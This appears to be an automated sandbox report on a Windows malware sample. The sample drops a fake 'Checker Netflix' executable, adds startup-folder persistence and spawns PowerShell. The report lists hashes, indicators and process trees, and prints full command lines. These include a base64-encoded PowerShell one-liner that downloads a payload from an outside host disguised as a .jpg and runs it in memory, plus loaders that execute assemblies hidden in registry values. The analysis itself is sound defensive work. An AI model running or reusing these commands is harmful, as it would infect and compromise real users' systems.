Analysis
max time kernel: 173s
max time network: 200s
platform: windows10-2004_x64
resource: win10v2004-20220414-en
submitted: 25-05-2022 00:29
Static task: static1
Behavioral task: behavioral1
Sample: a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe
Resource: win7-20220414-en
General
Target: a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe
Size: 1.7MB
MD5: 98bfaca19a9ae44bb60fbc3e98e54d09
SHA1: e2f100fc3eb808fe26cdc26327920293c1272cab
SHA256: a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3
SHA512: d8b5abdb9692f54a512d53589537bb8b4aa489443ef7ae77aede69d5c1510a32ce2508eeca1ff50898fb2305151c53b9f03449dac9a75b4ea8aa370a324f4fbe
Malware Config
Extracted: https://6.top4top.net/p_13529t6r71.jpg
Signatures
Blocklisted process makes network request (3 IoCs)
Processes:
flow | pid | process
17 | 2020 | powershell.exe
21 | 2020 | powershell.exe
60 | 4412 | powershell.exe
Executes dropped EXE (1 IoC)
Processes:
pid | process
4460 | Checker Netflix.exe
Checks computer location settings (2 TTPs, 4 IoCs)
Looks up the country code configured in the registry, likely a geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation | a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation | WScript.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation | WScript.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation | WScript.exe
Drops startup file (2 IoCs)
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KBnSgEeuZWeY.lnk | WScript.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PoYUIXZO.lnk | WScript.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTP)
Drops file in System32 directory (1 IoC)
Processes:
description | ioc | process
File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Modifies registry class (1 IoC)
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings | a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe
Suspicious behavior: EnumeratesProcesses (6 IoCs)
Processes:
pid | process
3848 | powershell.exe
4412 | powershell.exe
2020 | powershell.exe
3848 | powershell.exe
2020 | powershell.exe
4412 | powershell.exe
Suspicious use of AdjustPrivilegeToken (4 IoCs)
Processes:
description | pid | process
Token: SeDebugPrivilege | 3848 | powershell.exe
Token: SeDebugPrivilege | 4412 | powershell.exe
Token: SeDebugPrivilege | 2020 | powershell.exe
Token: SeDebugPrivilege | 4412 | powershell.exe
Suspicious use of WriteProcessMemory (21 IoCs)
Processes:
description | pid | process | target process
PID 3396 wrote to memory of 4460 | 3396 | a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe | Checker Netflix.exe
PID 3396 wrote to memory of 4460 | 3396 | a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe | Checker Netflix.exe
PID 3396 wrote to memory of 4460 | 3396 | a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe | Checker Netflix.exe
PID 3396 wrote to memory of 4300 | 3396 | a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe | WScript.exe
PID 3396 wrote to memory of 4300 | 3396 | a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe | WScript.exe
PID 3396 wrote to memory of 4300 | 3396 | a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe | WScript.exe
PID 3396 wrote to memory of 3712 | 3396 | a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe | WScript.exe
PID 3396 wrote to memory of 3712 | 3396 | a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe | WScript.exe
PID 3396 wrote to memory of 3712 | 3396 | a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe | WScript.exe
PID 3396 wrote to memory of 4060 | 3396 | a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe | WScript.exe
PID 3396 wrote to memory of 4060 | 3396 | a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe | WScript.exe
PID 3396 wrote to memory of 4060 | 3396 | a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe | WScript.exe
PID 3712 wrote to memory of 2020 | 3712 | WScript.exe | powershell.exe
PID 3712 wrote to memory of 2020 | 3712 | WScript.exe | powershell.exe
PID 3712 wrote to memory of 2020 | 3712 | WScript.exe | powershell.exe
PID 4060 wrote to memory of 3848 | 4060 | WScript.exe | powershell.exe
PID 4060 wrote to memory of 3848 | 4060 | WScript.exe | powershell.exe
PID 4060 wrote to memory of 3848 | 4060 | WScript.exe | powershell.exe
PID 4300 wrote to memory of 4412 | 4300 | WScript.exe | powershell.exe
PID 4300 wrote to memory of 4412 | 4300 | WScript.exe | powershell.exe
PID 4300 wrote to memory of 4412 | 4300 | WScript.exe | powershell.exe
Processes
C:\Users\Admin\AppData\Local\Temp\a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe (level 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe"
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID: 3396

  C:\Users\Admin\AppData\Roaming\Checker Netflix.exe (level 2)
    Command line: "C:\Users\Admin\AppData\Roaming\Checker Netflix.exe"
    - Executes dropped EXE
    PID: 4460

  C:\Windows\SysWOW64\WScript.exe (level 2)
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\l1l1l.vbs"
    - Checks computer location settings
    - Drops startup file
    - Suspicious use of WriteProcessMemory
    PID: 4300

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 3)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\tsQKDrCBEkat).evTHJP).'EntryPoint'.'Invoke'($Null,$Null)
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 4412

  C:\Windows\SysWOW64\WScript.exe (level 2)
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\r1r1.vbs"
    - Checks computer location settings
    - Drops startup file
    - Suspicious use of WriteProcessMemory
    PID: 4060

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 3)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\vLEwUGUT).gukeLLVoun).'EntryPoint'.'Invoke'($Null,$Null)
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 3848

  C:\Windows\SysWOW64\WScript.exe (level 2)
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\powershell.js"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID: 3712

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 3)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8ANgAuAHQAbwBwADQAdABvAHAALgBuAGUAdAAvAHAAXwAxADMANQAyADkAdAA2AHIANwAxAC4AagBwAGcAJwApACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAbgB1AGwAbAApAA==
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2020
Network
MITRE ATT&CK Enterprise v6
Downloads